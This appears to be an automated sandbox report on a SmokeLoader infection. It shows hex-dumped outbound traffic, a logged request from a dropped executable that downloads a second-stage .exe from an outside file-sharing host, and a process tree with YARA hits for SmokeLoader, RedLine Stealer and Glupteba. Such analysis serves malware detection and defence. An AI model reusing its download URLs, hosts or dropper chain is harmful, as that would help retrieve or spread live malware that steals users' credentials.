2023-12-27 16:58:37 UTC	15331	OUT	Data Raw: 25 c9 5f b3 d4 c2 96 16 91 8d 8a 77 2c 3d a1 cf 34 ec cf ce 7a 6d 6a 0e ca 7b 2c 6e 9e 26 92 91 09 6f eb da 9f 61 1c ef 5f a0 ec da e6 0e e3 7b b7 51 bd 3f 11 75 fa 02 e9 d0 ef 55 ae 48 b5 49 db 8a 90 16 f7 b8 4b 85 22 4d f1 77 d1 ea 0a 06 3d 0d 85 9c d4 c7 b6 4d ad 6a 1e c9 60 11 ef 9d de eb 30 d3 6b f4 89 c9 54 7f c5 f3 38 78 cc fa ad 10 a7 3e 28 c4 73 5d 22 c6 18 b5 d9 c9 de 70 74 b9 7d 83 15 53 49 e9 a4 b5 86 68 fe d1 b7 f8 bf 81 e4 ce 60 f4 3f 64 84 87 1c e8 e9 f4 7e b7 ae 04 6a 7f 9c 2f ef be fc a1 e7 80 3a c3 e2 cb 97 fc 17 57 2e fc 7d f0 df 0d 14 7f c0 16 ff 9d 39 be 43 18 44 0f aa 4f 21 db c6 9c 93 01 ed 47 f6 11 a0 b7 46 35 87 b7 aa 80 97 3b ad dd ea cf 4d 2b 2d 7d 80 91 4b 82 8a cd a8 ef e1 a2 27 c3 66 91 57 27 53 41 8a 16 fc 23 e3 8a d8 d1 ab Data Ascii: %_w,=4zmj{,n&oa_{Q?uUHIK"Mw=Mj`0kT8x>(s]"pt}SIh`?d~j/:W.}9CDO!GF5;M+-}K'fW'SA#
2023-12-27 16:58:37 UTC	15331	OUT	Data Raw: 2b f1 0b 35 58 2e a3 27 a4 95 e7 49 8d 7d 2f 9d 87 65 ac 74 15 29 cb ad bf cb 2a 57 25 10 fe 29 92 00 e3 e8 4d d4 98 d1 af b7 0e a7 35 3a 66 a5 d7 f8 76 c9 6c aa 0c 95 fa c2 d5 fa 1a 45 3b 08 7a 48 35 8d 32 3e 95 f0 7b 44 9d 0f 56 42 04 e9 3f 97 a6 29 89 6c b1 45 bb 16 a5 5e 01 ce 9a 93 ea 3f c2 ad 36 c6 cb 02 18 18 8c bd 6d e5 38 95 0c 45 40 91 20 24 3a 14 84 63 7b de b6 e0 17 79 af 0a b2 8a 70 a6 f8 a0 7f f4 4f f7 2a b0 e6 f1 37 5f 39 33 ce 8d aa c2 e5 71 2e fc c0 be 1e df c1 5f 56 dc 69 c0 cf d3 a6 c5 b1 c4 64 fa 59 18 ae a9 0a ea d9 61 01 e2 18 c0 68 d7 e2 e9 7d b8 9c c6 d0 5c 54 3c ff e4 f7 27 ee 13 f5 bc 04 91 e5 79 3f 2e 11 de f2 a2 ae ba ee 97 70 fd 65 11 13 e3 1f eb 2d c6 01 1b 94 0e 66 7c 4d 8b 0e 72 27 78 3b 78 78 2a 7b 5e 1c fc 78 d2 a2 cd 47 Data Ascii: +5X.'I}/et)W%)M5:fvlE;zH52>{DVB?)lE^?6m8E@ $:c{ypO7_93q._VidYah}\T<'y?.pe-f\|Mr'x;xx*{^xG
2023-12-27 16:58:37 UTC	15331	OUT	Data Raw: c2 4d 71 01 66 14 f3 52 ad e2 4e f5 e5 22 d0 61 cc 9d 92 2e 39 e3 3c 8f 9b 2e e9 56 75 3e 99 9b 43 4d b9 8d 4b e4 ee b7 46 34 66 0b a7 ec a0 65 6f 4f 49 c2 19 22 a4 d6 21 e5 69 3d f2 f7 7f 08 e9 7c 35 6b d4 ca 3c d7 92 f3 d1 a9 29 62 ae 58 68 45 a3 af f3 79 54 02 e7 93 7f 63 64 7d e5 73 46 ce 6d 33 58 f5 45 71 97 ca 0d 49 d8 fb ce e4 f6 4b 29 b9 d4 33 50 c6 ff 7a d7 5e 8e 10 64 1e 52 f6 1c 55 89 61 48 68 ec 2f 5a f1 63 0d b3 6c 0f 38 e4 83 14 5d 84 6b 1b 8e 93 6f 2f 5c c4 2b 36 9c 42 f5 f1 59 73 2f f9 29 89 ca 91 71 20 35 c3 40 89 28 55 85 bb 32 a2 2c 03 30 bb 64 6a f6 8a f1 1a 39 8c 4d c5 40 7f ba 77 d8 9e df 95 9b 9f ba 90 a9 10 be 15 b6 0a 16 9f 37 29 e2 01 be 04 52 39 22 c2 fc d2 7e 1d 68 27 42 c9 d7 81 fd e5 8e fc 1d 20 68 72 4c 2b 9a 88 cb 08 bd 19 Data Ascii: MqfRN"a.9<.Vu>CMKF4feoOI"!i=\|5k<)bXhEyTcd}sFm3XEqIK)3Pz^dRUaHh/Zcl8]ko/\+6BYs/)q 5@(U2,0dj9M@w7)R9"~h'B hrL+
2023-12-27 16:58:37 UTC	15331	OUT	Data Raw: fa 64 e3 d7 df 37 f0 c9 9e ce 9e cc 4a 81 35 e5 78 73 59 a4 40 1a 7c 35 0a 3d ed 23 a6 e3 5c c6 6b c2 ba fc 14 c1 97 09 34 70 50 29 86 7f 12 02 b8 e9 20 d2 cc 21 74 ec c1 20 1b a7 3e c0 ce c3 a4 f8 88 bd b8 37 fd 42 b2 4b ae dc ca 80 5c bb 47 00 04 df 8e 70 f5 91 16 d8 e3 f2 b0 a1 d0 68 47 ab 07 c0 3f 4d a2 b9 2b 91 86 e5 f6 ce 9b 25 72 1c ac b0 ae f5 42 22 7a 9b c2 b6 2d 61 86 e4 3b ec 07 22 02 fa 2f c2 4b e7 9e 89 e2 06 80 e7 09 f3 7a 0d 33 f8 3a 1a d9 bd 24 13 cf ec 2f 23 b0 0e 24 8a 7b 04 a3 93 40 a4 3c 2b 51 2a 6c aa b4 4d 68 e7 de 6b 1e 85 d2 41 8b 46 00 2f 99 50 74 c9 f0 22 b0 d8 43 86 e1 8f 85 fa fe b8 44 3c fc f9 e1 a8 39 44 8d 55 0e dd 7b 84 94 cc 9d 60 4f e0 d2 57 ba 27 26 28 97 24 68 fc e7 49 22 0e 94 79 ad 80 c5 88 5d 8c 3d 4f b4 4c 0f 69 2c Data Ascii: d7J5xsY@\|5=#\k4pP) !t >7BK\GphG?M+%rB"z-a;"/Kz3:$/#${@<+Q*lMhkAF/Pt"CD<9DU{`OW'&($hI"y]=OLi,
2023-12-27 16:58:37 UTC	15331	OUT	Data Raw: 84 8c f7 98 5f 37 39 66 11 8f ee 0a d2 7f f3 37 8a 5a 51 70 c9 bc 22 2e 06 8e 8e 5f 00 74 5a 84 cb b9 0a 19 8f 1c 00 05 09 3e db 6f 1e 73 df 76 8a d1 38 a4 80 91 c6 1c 3b da 21 13 99 2a d7 56 e9 d2 21 6c 06 f7 0e 14 5e 4c ab d7 53 15 33 3e 6d e7 06 bf fa 24 ab 63 8f d9 df 16 ee 32 67 3b 44 11 df 1f 24 36 c8 b3 6e ae 49 51 13 97 d4 4f fd f3 c6 18 46 7b 7d 55 2c 26 f1 39 59 92 ec 49 bd 85 06 68 41 c8 07 6f fb 61 ad 22 52 eb d3 11 1a e7 11 d5 6e 49 db 0e 04 0e ef 39 fa 06 77 8f 4d 9b db 69 4f df 19 59 11 04 30 d6 02 9d 8b 7b b8 10 36 36 44 cc d0 ac 05 d8 7e 2d d9 8e 36 42 76 7a e7 80 aa cf 68 c5 bd 83 9d 6a d6 aa 3b 8e a1 da 1b 60 a4 c2 07 5c 06 79 de 6e b5 f0 7e bb 29 c3 30 a9 5a 39 42 c9 3c b3 bb 67 09 d0 8e 52 6b 0d 26 3d a0 ac 18 ea 43 58 81 25 a1 57 f2 Data Ascii: _79f7ZQp"._tZ>osv8;!*V!l^LS3>m$c2g;D$6nIQOF{}U,&9YIhAoa"RnI9wMiOY0{66D~-6Bvzhj;`\yn~)0Z9B<gRk&=CX%W
2023-12-27 16:58:37 UTC	15331	OUT	Data Raw: f9 71 37 a2 63 75 c6 f5 68 44 ae e3 ba 80 08 3a fb 98 8e 16 5c 40 e7 7b 3c af 02 aa 86 0b 5c 57 3a bf f7 7c 63 21 b1 7a fb 2e 1d dd 1d 57 e9 dc 44 f2 e4 ee c7 ee 5b 9b 98 27 56 c2 1c 08 16 2e 77 16 f2 f6 bb 88 6c 4c 18 fc de db a2 c7 58 1d de 08 5d 57 36 14 5f c3 0a cf 1a 6d 67 e3 0b 2f 1a a6 45 cd c6 5d 9f d5 1b 1a 25 5e fd c3 d8 ae 40 a1 46 25 8d 29 ff 3b fc 89 32 ee 61 53 dd ac 92 40 94 06 56 f4 2a c9 94 d4 f8 d9 98 f9 71 05 7b ea 41 d4 bf d6 fc 26 ef 7e 84 33 df 7f 9e 9a 3a e9 ee a6 4c f3 dd 58 57 58 26 fb c2 c5 04 f7 f2 3b fe e0 8e 50 be 9b 60 19 a3 93 79 71 cd ab b5 5d 53 3a a6 04 2d a1 60 1d db 93 66 52 25 0c da 6d 2f 7c 22 45 f8 06 a3 b1 e3 a4 ce a7 28 c3 fc a9 e4 8f 2e 22 b2 b1 5b 47 32 26 ca 42 44 9c c2 8f ec d0 44 a9 25 8b dd e8 17 aa c9 47 69 Data Ascii: q7cuhD:\@{<\W:\|c!z.WD['V.wlLX]W6_mg/E]%^@F%);2aS@V*q{A&~3:LXWX&;P`yq]S:-`fR%m/\|"E(."[G2&BDD%Gi
2023-12-27 16:58:37 UTC	15331	OUT	Data Raw: e1 e5 d3 0d 5f 66 57 c7 4e 1f e8 18 21 12 3f c5 cc ac 7c 7b 1f fe 26 96 9c 20 ad ba d4 fc be 12 b8 a2 b2 3e 85 ff 10 2c 0c d6 6d 4f ea 34 ea 60 da a8 b4 61 28 fc 98 71 d9 84 06 77 80 42 bc fc 60 35 4c 8d a6 f2 f3 07 25 4c 81 35 9d 1d 2b 37 d6 8f bd d8 f4 c5 d6 e0 21 cb 2a 7c 4e a3 24 6c 10 43 50 ae 7d b8 79 6b a8 3f d2 68 fe 5b dd 23 9e 3a 5c 95 5e bf be 8c ee 93 66 f2 ea 6f fd 6b 68 fc 06 67 de a1 55 2f 80 61 9e f6 61 89 eb cb 78 ce bd 33 75 74 19 bb b4 22 a2 ab ad 19 45 65 04 2b 62 38 d3 0d 5b 13 dc ae f7 05 9c 41 a7 c0 33 5a f0 a5 7f a5 6a 67 6e 2c b0 0a 77 b6 88 c4 39 2f 59 66 ed ce ef 6a a9 a1 2f 57 74 c6 65 e7 88 a3 1c ef 00 e6 32 77 f6 0a f7 e3 58 a7 da 97 29 98 51 46 17 ea 21 69 e9 df 46 b6 14 8f 81 a5 b3 d9 56 1f 54 19 a9 bf 8c 02 6f d8 56 4d f7 Data Ascii: _fWN!?\|{& >,mO4`a(qwB`5L%L5+7!*\|N$lCP}yk?h[#:\^fokhgU/aax3ut"Ee+b8[A3Zjgn,w9/Yfj/Wte2wX)QF!iFVToVM
2023-12-27 16:58:39 UTC	1325	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:58:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=7uo1p0i8rfamo6bifkvobs205b; expires=Sun, 21-Apr-2024 10:45:17 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:58:38 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:58:38 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:58:38 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Lve39XoLGqsDoXWr5MtY0DwRcQ7IrTwxJj5moQ5NbtxjYJ1f%2FH2ZTDql5197gdraAbiOy1W0zmOu%2FbjbbQdQgJv7doFgocBq1yaZurCqhp4wMUyPq5I6s4e823WAAGHHpYFWEgkK9ig%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31bfdea576c50-DFW alt-svc: h3=":443"; ma=86400

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49860	194.15.112.248	443	7700	C:\Users\user\AppData\Local\Temp\9234.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-27 16:58:45 UTC	75	OUT	GET /TukN/PL1226two.exe HTTP/1.1 Host: oshi.at Connection: Keep-Alive
2023-12-27 16:58:46 UTC	158	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 27 Dec 2023 16:58:46 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 1849 Connection: close
2023-12-27 16:58:46 UTC	1849	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70 Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up

Target ID:	0
Start time:	17:56:52
Start date:	27/12/2023
Path:	C:\Users\user\Desktop\W73PCbSH71.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\W73PCbSH71.exe
Imagebase:	0x400000
File size:	38'227 bytes
MD5 hash:	C8159FA89113EC6FC180CCB76FF3BDC6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1687909281.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1687909281.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1688011276.00000000004F1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1688011276.00000000004F1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	17:56:58
Start date:	27/12/2023
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff72b770000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	17:57:17
Start date:	27/12/2023
Path:	C:\Users\user\AppData\Roaming\jfhrjta
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\jfhrjta
Imagebase:	0x400000
File size:	38'227 bytes
MD5 hash:	C8159FA89113EC6FC180CCB76FF3BDC6
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000003.00000002.1925341423.00000000001E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000003.00000002.1925341423.00000000001E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000003.00000002.1925621429.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000003.00000002.1925621429.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: C:\Users\user\AppData\Roaming\jfhrjta, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	17:57:21
Start date:	27/12/2023
Path:	C:\Users\user\AppData\Local\Temp\907.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\907.exe
Imagebase:	0xc30000
File size:	4'818'944 bytes
MD5 hash:	1713300BA962C869477E37E4B31E40AF
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000006.00000002.1919407201.00000000045B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000006.00000002.1919407201.0000000004CCD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000006.00000002.1919407201.0000000004D3A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\907.exe, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	17:57:22
Start date:	27/12/2023
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Imagebase:	0x140000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	17:57:22
Start date:	27/12/2023
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Imagebase:	0x5e0000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000008.00000002.3177470933.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000008.00000002.3200026588.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	17:57:33
Start date:	27/12/2023
Path:	C:\Users\user\AppData\Local\Temp\3613.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\3613.exe
Imagebase:	0x6a0000
File size:	19'755'520 bytes
MD5 hash:	ED2FD5173AF900C56220101CE6648515
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	17:57:33
Start date:	27/12/2023
Path:	C:\Users\user\AppData\Local\Temp\InstallSetup8.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\InstallSetup8.exe"
Imagebase:	0x400000
File size:	2'349'777 bytes
MD5 hash:	31F42479194700F598C22EA83FA196C1
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	17:57:33
Start date:	27/12/2023
Path:	C:\Users\user\AppData\Local\Temp\InstallSetup8.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\InstallSetup8.exe"
Imagebase:	0x400000
File size:	2'349'777 bytes
MD5 hash:	31F42479194700F598C22EA83FA196C1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	14
Start time:	17:57:34
Start date:	27/12/2023
Path:	C:\Users\user\AppData\Local\Temp\toolspub2.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\toolspub2.exe"
Imagebase:	0x400000
File size:	290'304 bytes
MD5 hash:	2D24E3BAA2A16E47BEE10E91381E6391
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000E.00000002.2053247085.000000000058C000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	17:57:34
Start date:	27/12/2023
Path:	C:\Users\user\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
Imagebase:	0x400000
File size:	4'421'000 bytes
MD5 hash:	1E40D9A53D79AA807EB8AF132F417E53
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 0000000F.00000002.2342467116.0000000000843000.00000040.00000001.01000000.0000000C.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000000F.00000002.2430493808.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 0000000F.00000003.2047877802.0000000003B02000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000F.00000002.2416198321.00000000029D5000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 0000000F.00000002.2430493808.0000000003213000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	17:57:34
Start date:	27/12/2023
Path:	C:\Users\user\AppData\Local\Temp\BroomSetup.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\BroomSetup.exe
Imagebase:	0x400000
File size:	5'515'264 bytes
MD5 hash:	00E93456AA5BCF9F60F84B0C0760A212
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000010.00000000.2046828797.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	17
Start time:	17:57:34
Start date:	27/12/2023
Path:	C:\Users\user\AppData\Local\Temp\toolspub2.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\toolspub2.exe"
Imagebase:	0x400000
File size:	290'304 bytes
MD5 hash:	2D24E3BAA2A16E47BEE10E91381E6391
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000011.00000002.2100813510.00000000004A1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000011.00000002.2100813510.00000000004A1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000011.00000002.2100651927.0000000000470000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000011.00000002.2100651927.0000000000470000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	17:57:35
Start date:	27/12/2023
Path:	C:\Users\user\AppData\Local\Temp\3FF8.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\3FF8.exe
Imagebase:	0xed0000
File size:	580'608 bytes
MD5 hash:	1A344159928228AF15C9BD838C73E319
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	17:57:35
Start date:	27/12/2023
Path:	C:\Users\user\AppData\Local\Temp\tuc4.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\tuc4.exe"
Imagebase:	0x400000
File size:	8'139'021 bytes
MD5 hash:	69CF42BBFE7778CE5D750AA4B51AAD9D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	20
Start time:	17:57:35
Start date:	27/12/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	17:57:35
Start date:	27/12/2023
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Imagebase:	0x840000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	17:57:35
Start date:	27/12/2023
Path:	C:\Users\user\AppData\Local\Temp\etopt.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\etopt.exe"
Imagebase:	0x400000
File size:	4'544'252 bytes
MD5 hash:	F77ABC2F79780428CA514C0041C8B9E9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	17:57:36
Start date:	27/12/2023
Path:	C:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmp
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmp" /SL5="$40060,7884275,54272,C:\Users\user\AppData\Local\Temp\tuc4.exe"
Imagebase:	0x400000
File size:	704'512 bytes
MD5 hash:	A7662827ECAEB4FC68334F6B8791B917
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	26
Start time:	17:57:36
Start date:	27/12/2023
Path:	C:\Users\user\AppData\Local\Temp\etopt.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\etopt.exe"
Imagebase:	0x400000
File size:	4'544'252 bytes
MD5 hash:	F77ABC2F79780428CA514C0041C8B9E9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	17:57:38
Start date:	27/12/2023
Path:	C:\Users\user\AppData\Local\Temp\tuc4.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\tuc4.exe" /SPAWNWND=$104BA /NOTIFYWND=$40060
Imagebase:	0x400000
File size:	8'139'021 bytes
MD5 hash:	69CF42BBFE7778CE5D750AA4B51AAD9D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	28
Start time:	17:57:38
Start date:	27/12/2023
Path:	C:\Users\user\AppData\Local\Temp\4BEF.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\4BEF.exe
Imagebase:	0xb10000
File size:	5'472'256 bytes
MD5 hash:	04F93F610DF4D1C941EC7F64679E3039
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	17:57:38
Start date:	27/12/2023
Path:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp" /SL5="$10526,7884275,54272,C:\Users\user\AppData\Local\Temp\tuc4.exe" /SPAWNWND=$104BA /NOTIFYWND=$40060
Imagebase:	0x400000
File size:	704'512 bytes
MD5 hash:	A7662827ECAEB4FC68334F6B8791B917
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

